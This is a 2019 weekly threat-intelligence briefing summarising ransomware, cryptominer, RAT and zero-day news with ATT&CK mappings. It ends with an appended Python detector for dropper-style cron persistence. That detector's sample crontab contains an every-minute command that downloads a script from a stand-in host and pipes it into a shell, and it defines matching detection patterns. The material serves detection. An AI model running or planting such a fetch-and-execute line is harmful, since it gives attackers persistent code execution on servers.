June 25, 2019 - Anomali Threat Research

Weekly Threat Briefing: Millions Exposed in Desjardins Data Leak

<p>This section contains summaries of various threat intelligence stories that occurred during the past week. The intelligence in this week’s iteration discusses the following threats: <b>BlueKeep</b>, <b>Cryptominers</b>, <b>FlawedAmmyy Trojan</b>, <b>Sodinokibi</b>, and <b>TA505</b>. The IOCs related to these stories are attached to the Community Threat Briefing and can be used to check your logs for potential malicious activity.</p><h2>Trending Threats</h2><p><a href="https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-spreads-wide-via-hacked-msps-sites-and-spam/" target="_blank"><b>Sodinokibi Ransomware Spreads Wide via Hacked MSPs, Sites and Spam</b></a> (<i>June 21, 2019</i>)<br/> In a new round of attacks, Managed Service Providers (MSPs) are being compromised to distribute “Sodinokibi” ransomware. After gaining remote access to MSPs, threat actors were able to push Sodinokibi to endpoints using the MSPs’ Webroot Management Console. Once the user runs the malicious code, their files are encrypted and a ransom is demanded to decrypt them. In another attempt to spread the ransomware, “WinRar Italy” was compromised so that users would download Sodinokibi instead of the legitimate software.
Webroot logged all customers out of their consoles and has enabled mandatory two-factor authentication in response to the attacks.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947287">[MITRE ATT&amp;CK] PowerShell - T1086</a> | <a href="https://ui.threatstream.com/ttp/947139">[MITRE ATT&amp;CK] Remote Access Tools - T1219</a> | <a href="https://ui.threatstream.com/ttp/947203">[MITRE ATT&amp;CK] Web Service - T1102</a></p><p><a href="https://safebreach.com/Post/OEM-Software-Puts-Multiple-Laptops-At-Risk" target="_blank"><b>OEM Software Puts Multiple Laptops At Risk</b></a> (<i>June 21, 2019</i>)<br/> Researchers at SafeBreach Labs have identified a vulnerability in Dell’s “SupportAssist” software, which is preinstalled on millions of Dell laptops and PCs to carry out health checks. The vulnerability, “CVE-2019-12280,” can allow an actor to escalate privileges and achieve persistence on an affected machine. Because of how the software loads .dll files, malicious DLLs placed in specific directories could be loaded, enabling an attacker to gain complete control of a system. SupportAssist is maintained by PC Doctor, which also provides tools for other Windows computers, so computers other than Dell’s could also be at risk.
The vulnerability was reported to Dell on April 29th by SafeBreach, with Dell reporting it to PC Doctor, who released fixes on May 28th.<br/> <a href="https://forum.anomali.com/t/oem-software-puts-multiple-laptops-at-risk/3915" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947139">[MITRE ATT&amp;CK] Remote Access Tools - T1219</a> | <a href="https://ui.threatstream.com/ttp/947125">[MITRE ATT&amp;CK] System Information Discovery - T1082</a></p><p><a href="https://www.bleepingcomputer.com/news/security/microsoft-warns-of-campaign-dropping-flawedammyy-rat-in-memory/" target="_blank"><b>Microsoft Warns of Campaign Dropping FlawedAmmyy RAT in Memory</b></a> (<i>June 21, 2019</i>)<br/> Microsoft has issued a warning about an active campaign targeting South Koreans with the FlawedAmmyy Remote Access Trojan (RAT). FlawedAmmyy is a RAT used frequently by the threat group TA505 in spam campaigns. Using a spam email, the actors try to convince users to open an Excel file that runs a macro function along with an executable in memory. This executable downloads another malware straight into the computer’s memory.
The vulnerability exploited, registered as CVE-2017-11882, was patched two years ago; however, unpatched systems are still being targeted by threat actors.<br/> <a href="https://forum.anomali.com/t/microsoft-warns-of-campaign-dropping-flawedammyy-rat-in-memory/3916" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947287">[MITRE ATT&amp;CK] PowerShell - T1086</a> | <a href="https://ui.threatstream.com/ttp/947139">[MITRE ATT&amp;CK] Remote Access Tools - T1219</a> | <a href="https://ui.threatstream.com/ttp/947180">[MITRE ATT&amp;CK] Spearphishing Attachment - T1193</a></p><p><a href="https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/" target="_blank"><b>LoudMiner Cryptomining Malware Targets Powerful Audio Creation PCs</b></a> (<i>June 21, 2019</i>)<br/> Researchers at ESET have identified a cryptocurrency miner, named “LoudMiner”, that uses virtual machines to run on Windows and macOS. The malware, which is based on the “XMRig” miner, is spreading through a website offering cracked (free/illegal) copies of Virtual Studio Technology (VST) software. Machines running VST software are targeted because that software already demands heavy CPU usage, which lets the miner’s own load go unnoticed for longer.
Using a virtual machine, a Linux XMRig cryptominer is run on infected machines to mine cryptocurrency at the victim’s expense.<br/> <a href="https://forum.anomali.com/t/loudminer-cryptomining-malware-targets-powerful-audio-creation-pcs/3917" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&amp;CK] User Execution - T1204</a> | <a href="https://ui.threatstream.com/ttp/1260045">[MITRE PRE-ATT&amp;CK] Upload, install, and configure software/tools (PRE-T1139)</a></p><p><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-mining-botnet-arrives-through-adb-and-spreads-through-ssh/" target="_blank"><b>Cryptocurrency-Mining Botnet Malware Arrives Through ADB and Spreads Through SSH</b></a> (<i>June 20, 2019</i>)<br/> Trend Micro researchers have identified a new cryptominer botnet malware that arrives through open Android Debug Bridge (ADB) ports and spreads through SSH. As ADB has no authentication by default, the malware is able to infect the system and then spread to any other system that has had an SSH connection with the host. Via the ADB command line the payload is downloaded, after which the commands used and the downloaded files are deleted to remove any trace of the attack.
Because SSH records systems the host has connected to in its known_hosts file, the malware reads that list to find further systems to infect.<br/> <a href="https://forum.anomali.com/t/cryptocurrency-mining-botnet-malware-arrives-through-adb-and-spreads-through-ssh/3918" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947224">[MITRE ATT&amp;CK] Exfiltration Over Alternative Protocol - T1048</a> | <a href="https://ui.threatstream.com/ttp/947164">[MITRE ATT&amp;CK] File Deletion - T1107</a> | <a href="https://ui.threatstream.com/ttp/947235">[MITRE ATT&amp;CK] Obfuscated Files or Information - T1027</a> | <a href="https://ui.threatstream.com/ttp/1260045">[MITRE PRE-ATT&amp;CK] Upload, install, and configure software/tools (PRE-T1139)</a></p><p><a href="https://www.bloomberg.com/news/articles/2019-06-20/desjardins-says-2-9-million-clients-exposed-in-quebec-data-leak?" target="_blank"><b>Millions Exposed in Desjardins Data Leak</b></a> (<i>June 20, 2019</i>)<br/> In one of Canada’s largest data breaches, 2.9 million credit union members of Desjardins Group had their Personally Identifiable Information (PII) leaked. Starting in late 2018, a police investigation was launched following a suspicious transaction, which led to the police notifying Desjardins on June 14 about the extent of the breach. The leaked information, which included addresses, birthdates, banking habits, email addresses, phone numbers, names, and social security numbers, was the result of an employee acting illegally.
Following the leak, Desjardins conducted its own investigation, which resulted in the employee being fired and security being tightened.<br/> <a href="https://forum.anomali.com/t/millions-exposed-in-desjardins-data-leak/3919" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/1259983">[MITRE PRE-ATT&amp;CK] Identify sensitive personnel information (PRE-T1051)</a></p><p><a href="https://blog.sucuri.net/2019/06/cryptomining-dropper-and-cronjob-creator.html" target="_blank"><b>Cryptomining Dropper and Cronjob Creator</b></a> (<i>June 19, 2019</i>)<br/> A cryptomining dropper malware has been reported on by Sucuri researchers after they received information from an unknown individual who had discovered a process running on their web server. Using a Bash script on the server, threat actors download the cryptominer to the victims’ systems; as of this writing, it is unknown how the actors initially compromised the servers, but it is likely through an unpatched vulnerability, brute force, or phishing for admin credentials. The Bash script looks for any other cryptomining processes that are already running, kills any it finds, and then downloads the cryptominer. The payload and configuration file are deleted to hide the miner’s presence. To gain persistence, a cron job runs every minute to check for the Bash script and re-download and execute it if it has been removed.
This enables the malware to reinfect the host even after all malicious files have been removed.<br/> <a href="https://forum.anomali.com/t/cryptomining-dropper-and-cronjob-creator/3920" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947227">[MITRE ATT&amp;CK] Brute Force - T1110</a> | <a href="https://ui.threatstream.com/ttp/947164">[MITRE ATT&amp;CK] File Deletion - T1107</a> | <a href="https://ui.threatstream.com/ttp/1259968">[MITRE PRE-ATT&amp;CK] Host-based hiding techniques (PRE-T1091)</a> | <a href="https://ui.threatstream.com/ttp/947235">[MITRE ATT&amp;CK] Obfuscated Files or Information - T1027</a> | <a href="https://ui.threatstream.com/ttp/947139">[MITRE ATT&amp;CK] Remote Access Tools - T1219</a> | <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting - T1064</a></p><p><a href="https://news.drweb.com/show/?i=13315&amp;c=9&amp;lng=en&amp;p=0" target="_blank"><b>New Node.js Trojan Threatens Gamers</b></a> (<i>June 19, 2019</i>)<br/> Researchers at Doctor Web have identified a new type of trojan written in JavaScript that uses Node.js to execute itself. Via websites that post video game cheats, a 7zip archive containing what the user believes are cheats is downloaded, with the trojan contained in the archive.
Once the executable file is run, the trojan is downloaded and installed, gathering system information and running a cryptocurrency miner.<br/> <a href="https://forum.anomali.com/t/new-node-js-trojan-threatens-gamers/3921" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&amp;CK] User Execution - T1204</a> | <a href="https://ui.threatstream.com/ttp/947203">[MITRE ATT&amp;CK] Web Service - T1102</a> | <a href="https://ui.threatstream.com/ttp/947125">[MITRE ATT&amp;CK] System Information Discovery - T1082</a></p><p><a href="https://thehackernews.com/2019/06/mozilla-firefox-patch-update.html" target="_blank"><b>Mozilla Firefox 67.0.3 Patches Actively Exploited Zero-Day</b></a> (<i>June 19, 2019</i>)<br/> Mozilla has released two updates for its Firefox web browser to patch a critical zero-day vulnerability registered as CVE-2019-11707. The vulnerability can be exploited by threat actors to execute code remotely and gain complete control of a vulnerable system.
Actors could inject malicious code into a site’s JavaScript and trick users of unpatched versions into running the code on their system.<br/> <a href="https://forum.anomali.com/t/mozilla-firefox-67-0-3-patches-actively-exploited-zero-day/3922" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947244">[MITRE ATT&amp;CK] Exploitation for Client Execution - T1203</a> | <a href="https://ui.threatstream.com/ttp/947139">[MITRE ATT&amp;CK] Remote Access Tools - T1219</a> | <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting - T1064</a> | <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&amp;CK] User Execution - T1204</a> | <a href="https://ui.threatstream.com/ttp/947203">[MITRE ATT&amp;CK] Web Service - T1102</a></p><p><a href="https://www.zdnet.com/article/oracle-patches-another-actively-exploited-weblogic-zero-day/" target="_blank"><b>Oracle Patches Another Actively-Exploited WebLogic Zero-Day</b></a> (<i>June 19, 2019</i>)<br/> Oracle has patched a zero-day vulnerability in WebLogic servers. Identified as CVE-2019-2729, the vulnerability allows a threat actor to run code on a server without authentication. Like the recent WebLogic vulnerability CVE-2019-2725, this bug lies in the deserialization process, where binary content is converted back into its original form, and it can be exploited for unauthenticated code execution on vulnerable systems.
Threat actors are targeting corporate networks because of the large number of installed WebLogic servers, which lets them plant cryptomining malware on the vulnerable servers.<br/> <a href="https://forum.anomali.com/t/oracle-patches-another-actively-exploited-weblogic-zero-day/3923" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947139">[MITRE ATT&amp;CK] Remote Access Tools - T1219</a> | <a href="https://ui.threatstream.com/ttp/947203">[MITRE ATT&amp;CK] Web Service - T1102</a> | <a href="https://ui.threatstream.com/ttp/1260045">[MITRE PRE-ATT&amp;CK] Upload, install, and configure software/tools (PRE-T1139)</a> | <a href="https://ui.threatstream.com/ttp/947259">[MITRE ATT&amp;CK] Data Encoding - T1132</a></p><p><a href="https://www.darkreading.com/vulnerabilities---threats/dhs-tests-remote-exploit-for-bluekeep-rdp-vulnerability/d/d-id/1334986" target="_blank"><b>DHS Tests Remote Exploit for BlueKeep RDP Vulnerability</b></a> (<i>June 17, 2019</i>)<br/> The US Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) announced that it has identified a Remote Code Execution (RCE) exploit for “BlueKeep,” a vulnerability affecting older versions of Windows, from Windows 2000 through Windows 7. In the alert, CISA notes that Windows 2000 is vulnerable to a “wormable” attack that would spread to other vulnerable systems in a manner similar to the 2017 WannaCry attacks. By exploiting the vulnerability, an unauthenticated user can access a system remotely to install malware.
Microsoft has issued patches and, given the vulnerability’s critical nature, is warning organizations to apply them.<br/> <a href="https://forum.anomali.com/t/dhs-tests-remote-exploit-for-bluekeep-rdp-vulnerability/3924" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947139">[MITRE ATT&amp;CK] Remote Access Tools - T1219</a> | <a href="https://ui.threatstream.com/ttp/947203">[MITRE ATT&amp;CK] Web Service - T1102</a></p><p><a href="https://www.bleepingcomputer.com/news/security/android-malware-bypasses-2fa-by-stealing-one-time-passwords/" target="_blank"><b>Android Malware Bypasses 2FA by Stealing One-Time Passwords</b></a> (<i>June 17, 2019</i>)<br/> Malware capable of stealing Android one-time passwords has been discovered by researchers at ESET. In an attempt to strengthen security, Google previously banned apps from accessing SMS and call logs when this is not necessary. However, threat actors have found a way to bypass this by reading notifications to steal one-time passwords and two-factor authentication codes. Between June 7 and June 13, fake Turkish cryptocurrency apps were uploaded to the Google Play Store that attempt to steal login credentials by requesting permission to read all notifications. Once the permission is granted, the fake application phishes for credentials with a fake login screen and collects notifications from a specific list of apps.
In addition, control of notifications enables the threat actors to delete and silence them, hiding the activity from the user.<br/> <a href="https://forum.anomali.com/t/android-malware-bypasses-2fa-by-stealing-one-time-passwords/3925" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/1259983">[MITRE PRE-ATT&amp;CK] Identify sensitive personnel information (PRE-T1051)</a> | <a href="https://ui.threatstream.com/ttp/947235">[MITRE ATT&amp;CK] Obfuscated Files or Information - T1027</a> | <a href="https://ui.threatstream.com/ttp/947263">[MITRE ATT&amp;CK] Spearphishing via Service - T1194</a> | <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&amp;CK] User Execution - T1204</a></p><h2>Observed Threats</h2><p>This section includes the top threats observed from the Anomali Community user base as well as sensors deployed by Anomali Labs. A ThreatStream account is required to view this section. <a href="https://www.anomali.com/products" target="_blank">Click here to request a trial.</a></p><p><a href="https://ui.threatstream.com/actor/26092" target="_blank">TA505</a><br/> The financially-motivated threat group called “TA505” was first reported on by Proofpoint researchers in December 2017.[1] Malicious activity attributed to the Russian-speaking group dates back to at least 2014, and the campaigns conducted by TA505 have targeted entities and individuals around the world. The group distributes a variety of malware: well-known strains (Dridex banking trojan, Locky ransomware), custom-created ones (Jaff ransomware, tRAT), and variants of legitimate remote access tools (Remote Manipulator System). The group primarily distributes malware and tools via large-scale, indiscriminately distributed malspam campaigns, often through the “Necurs” botnet, with malicious attachments or links.
The incorporation of new malware, the creation of custom malware, and the use of advanced tactics such as the removal of malware artifacts indicate that this group is a sophisticated and likely well-funded threat. The group is innovative and shows the flexibility to pivot to other techniques and malware trends on a global scale.</p>
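The every-minute cron persistence described in the Cryptomining Dropper item above leaves a recognisable footprint in crontab output. The following is an added defender-side example, not code from Sucuri or Anomali: it parses crontab lines and flags entries that combine an every-minute schedule with a network fetch piped into a shell. The crontab lines and the example.invalid URL are constructed for the demonstration.

```python
import re

# Constructed sample crontab (not from the Sucuri report). The first entry
# mimics the re-download-and-execute pattern described in the briefing.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
* * * * * curl -fsSL http://example.invalid/x.sh | sh > /dev/null 2>&1
*/5 * * * * /usr/local/bin/backup.sh
0 3 * * * wget -q -O /opt/app/feed.json https://example.invalid/feed
* * * * * /usr/bin/php /var/www/html/cron.php
"""

DOWNLOADERS = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|z|da)?sh\b")
TMP_PATH = re.compile(r"/(tmp|dev/shm|var/tmp)/")


def parse_crontab(text):
    """Yield (schedule, command) for each non-comment crontab entry."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue  # environment assignment or malformed line
        yield " ".join(fields[:5]), fields[5]


def every_minute(schedule):
    """True when all five schedule fields are '*' (runs every minute)."""
    return schedule.split() == ["*"] * 5


def score_entry(schedule, command):
    """Return the list of dropper-like traits found in one entry."""
    reasons = []
    if every_minute(schedule):
        reasons.append("runs every minute")
    if DOWNLOADERS.search(command):
        reasons.append("fetches content from the network")
    if PIPE_TO_SHELL.search(command):
        reasons.append("pipes download straight into a shell")
    if TMP_PATH.search(command):
        reasons.append("uses a world-writable temp path")
    if "/dev/null" in command:
        reasons.append("discards output")
    return reasons


def find_suspicious(text, min_reasons=3):
    """Return [(command, reasons)] for entries with >= min_reasons traits."""
    hits = []
    for schedule, command in parse_crontab(text):
        reasons = score_entry(schedule, command)
        if len(reasons) >= min_reasons:
            hits.append((command, reasons))
    return hits


if __name__ == "__main__":
    for command, reasons in find_suspicious(SAMPLE_CRONTAB):
        print(command, "->", "; ".join(reasons))
```

Feed it the output of `crontab -l` for each user plus the contents of /etc/cron.d to cover system-wide entries; the threshold is deliberately conservative so that ordinary every-minute jobs such as the PHP entry above are not flagged on their own.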
